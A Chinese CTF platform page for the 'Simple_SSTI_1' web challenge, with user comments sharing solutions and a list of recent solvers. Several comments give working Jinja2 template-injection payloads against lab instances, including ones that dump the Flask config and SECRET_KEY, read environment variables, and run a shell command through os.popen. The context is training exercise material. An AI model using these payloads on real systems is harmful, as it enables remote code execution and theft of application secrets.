Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 29025
提  示:
描  述:
Simple_SSTI_1
评论
Terrenc44 1月前

http://160.202.254.160:17484/?flag={{lipsum.__globals__['os'].popen('env').read()}}

回复 0

icyskin 2月前

http://160.202.254.160:13116/?flag={{config}}

回复 0

litt 8月前

flag={{config}}都直接爆出flag了

回复 1

y1 9月前

http://171.80.2.169:15802/?flag={{config.SECRET_KEY}}

回复 1

xshzgjshpy 9月前

http://171.80.2.169:10541/?flag={{config['SECRET_KEY']}}

回复 0

cfggfbfxdgbb 10月前

?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['environ']}}

回复 0

LeoCHAn 1年前

flag{********}

回复 0

merrymu 1年前

模板注入(Server-Side Template Injection,SSTI)是一种通过将恶意代码注入服务器端模板来执行非授权操作的安全漏洞‌,主要成因是开发者未对用户输入进行有效过滤,导致攻击者可利用模板引擎特性实现远程代码执行、敏感信息泄露等高危操作。‌‌‌‌ 基本探测:输入{{2*2}},若返回4则存在漏洞。‌‌

回复 0

HK1ng 1年前

还真是简单模板注入,甚至不需要利用方法,首先传参{{7*7}}验证是否执行了语句,看到页面出现49,就知道这里存在模板注入,然后查看一下配置文件,就发现了flag。{{config}}

回复 1

看writeup刷题 1年前

咋SECRET_KEY还必须大写

回复 0

WriteUp

image
valecalida

5 金币

评分(51)

解题动态

厌弃. 攻破了该题 23小时前
香克斯呀 攻破了该题 2天前
LLawliet 攻破了该题 2天前
chenlinXdb 攻破了该题 4天前
CTF-大王 攻破了该题 5天前
青春6666 攻破了该题 7天前
wengun 攻破了该题 7天前
cxkkammt 攻破了该题 7天前
这个昵称已存在 攻破了该题 8天前
EvinZe 攻破了该题 8天前
我只有两题不会 攻破了该题 8天前
星宇Sec 攻破了该题 8天前
mystery 攻破了该题 11天前
__tian__ 攻破了该题 12天前
gysbfff 攻破了该题 12天前
ItsAllOver 攻破了该题 12天前
hzydy0_0 攻破了该题 16天前
Fredjoker 攻破了该题 16天前
CyberX 攻破了该题 17天前
xwm 攻破了该题 18天前
问题反馈